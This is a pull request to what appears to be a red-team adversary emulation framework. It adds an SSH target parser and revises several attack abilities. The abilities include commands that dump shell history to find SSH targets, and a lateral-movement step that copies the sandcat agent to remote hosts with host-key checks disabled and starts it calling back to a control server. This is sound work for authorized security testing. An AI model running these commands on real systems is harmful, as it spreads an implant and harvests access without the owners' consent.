### PR TITLE
VIRTS-880 Clean up ability: Start 54ndc47

### DIFF
--- a/app/parsers/ssh.py
+++ b/app/parsers/ssh.py
@@ -1,0 +1,19 @@
+import re
+from app.objects.secondclass.c_relationship import Relationship
+from app.utility.base_parser import BaseParser
+
+
+class Parser(BaseParser):
+
+    def parse(self, blob):
+        relationships = []
+        for ssh_cmd in re.findall(r'[\w.]+@[\w.]+', blob):
+            for mp in self.mappers:
+                source = self.set_value(mp.source, ssh_cmd, self.used_facts)
+                target = self.set_value(mp.target, ssh_cmd, self.used_facts)
+                relationships.append(
+                    Relationship(source=(mp.source, source),
+                                 edge=mp.edge,
+                                 target=(mp.target, target))
+                )
+        return relationships

--- a/app/parsers/ssh.py
+++ b/app/parsers/ssh.py
@@ -1,4 +1,5 @@
 import re
+
 from app.objects.secondclass.c_relationship import Relationship
 from app.utility.base_parser import BaseParser
 

--- a/app/parsers/ssh.py
+++ b/app/parsers/ssh.py
@@ -7,7 +7,7 @@ class Parser(BaseParser):
 
     def parse(self, blob):
         relationships = []
-        for ssh_cmd in re.findall(r'[\w.]+@[\w.]+', blob):
+        for ssh_cmd in re.findall(r'ssh.* (\w.+@\w.+)', blob):
             for mp in self.mappers:
                 source = self.set_value(mp.source, ssh_cmd, self.used_facts)
                 target = self.set_value(mp.target, ssh_cmd, self.used_facts)

--- a/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
+++ b/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
@@ -12,7 +12,13 @@
       sh:
         command: |
           pip install stormssh && storm list
+        parsers:
+          plugins.stockpile.app.parsers.ssh:
+            - source: remote.ssh.cmd
     linux:
       sh:
         command: |
           pip install stormssh && storm list
+        parsers:
+          plugins.stockpile.app.parsers.ssh:
+            - source: remote.ssh.cmd

--- a/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml
+++ b/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml
@@ -10,7 +10,13 @@
   platforms:
     darwin:
       sh:
-        command: cat ~/.bash_history
+        command: find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
+        parsers:
+          plugins.stockpile.app.parsers.ssh:
+            - source: remote.ssh.cmd
     linux:
       sh:
         command: cat ~/.bash_history
+        parsers:
+          plugins.stockpile.app.parsers.ssh:
+              - source: remote.ssh.cmd

--- a/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
+++ b/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
@@ -2,7 +2,7 @@
 
 - id: 10a9d979-e342-418a-a9b0-002c483e0fa6
   name: Start 54ndc47
-  description: Copy 54ndc47 to remote host and start it
+  description: Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication
   tactic: lateral-movement
   technique:
     attack_id: T1184
@@ -11,14 +11,16 @@
     darwin:
       sh:
         command: |
-          ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go-linux 1>/dev/null 2>/dev/null &'
+          scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
+          ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
         cleanup: |
-          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} '(pkill -f sandcat)'
-        payload: sandcat.go-linux
+          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
+        payload: sandcat.go-darwin
     linux:
       sh:
         command: |
-          ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go-linux 1>/dev/null 2>/dev/null &'
+          scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&
+          ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
         cleanup: |
-          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} '(pkill -f sandcat)'
-        payload: sandcat.go
+          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
+        payload: sandcat.go-linux


### PR DESCRIPTION
- Added ssh.py parser for parsing ssh targets from ssh commands (user@remote -> remote.ssh.cmd)
- Added ssh parser to Dump History and Parse SSH Config ability
- Fixed Dump History command for darwin
- Fixed command and clean up for Start 54ndc47 ability